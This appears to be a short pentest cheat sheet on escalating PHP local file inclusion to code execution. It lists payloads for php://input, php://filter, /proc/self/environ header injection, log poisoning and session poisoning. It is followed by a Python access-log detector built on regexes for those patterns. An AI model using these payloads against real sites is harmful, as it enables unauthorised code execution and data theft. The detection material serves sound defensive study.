File Inclusion
LFI to shell
- use page=php://input , payload must be in the POST body (but the request is GET), e.g. <?php echo system('whoami');?> ; this is also possible for zip:// and phar://
- get source code with filter: page=php://filter/convert.base64-encode/resource=<filename>
- page=../../../../../proc/self/environ , if this is accessible we can set the user agent to PHP code in <?php .. ?> and get it executed; this can also be done for /proc/self/id/<id> and the referrer field (bruteforce the id)
- log poisoning, write PHP into log via error message and request via LFI
- session poisoning, write a malicious session variable and include the session from /var/lib/phpX/sess_<phpsessid>
Many of these techniques are automated and implemented in LFISuite.
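
Each technique above leaves a recognisable trace in the web server's access log, so the list doubles as a detection checklist. The following is an added example, not part of the original notes: it flags requests whose page parameter carries a stream wrapper, traversal sequence, /proc/self or session-file path, and PHP tags in the Referer or User-Agent. It assumes combined log format; the regexes, finding names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Rules for the include parameter, one per technique in the list above (example's own regexes).
PARAM_RULES = {
    "stream-wrapper": re.compile(r"^(php|zip|phar)://", re.I),
    "traversal": re.compile(r"(^|/)\.\.(/|$)"),
    "sensitive-path": re.compile(r"/proc/self/|/sess_[A-Za-z0-9,-]+$"),
}
PHP_TAG = re.compile(r"<\?(php|=)", re.I)
# Combined log format: "METHOD target PROTO" status size "referer" "user-agent"
LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
                  r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')

# Constructed sample log lines (documentation IP range, harmless PHP marker).
SAMPLE = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=..%252f..%252f..%252fproc/self/environ HTTP/1.1" 200 900 "-" "<?php /* constructed */ ?>"',
    '203.0.113.5 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?page=/var/lib/php/sess_abc123 HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

def decode(value, rounds=3):
    """Undo nested percent-encoding so %252e%252e%252f still reads as ../"""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value.replace("\\", "/")

def classify(line, param="page"):
    """Return the sorted finding names for one access-log line."""
    m = LINE.search(line)
    if not m:
        return []
    findings = set()
    for key, raw in parse_qsl(urlsplit(m["target"]).query):
        if key == param:
            value = decode(raw)
            findings.update(n for n, rx in PARAM_RULES.items() if rx.search(value))
    # Header fields end up in /proc/self/environ and in logs, so PHP tags there matter.
    if any(PHP_TAG.search(decode(f)) for f in (m["ref"], m["ua"])):
        findings.add("php-in-header")
    return sorted(findings)

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry), entry.split('"')[1])
```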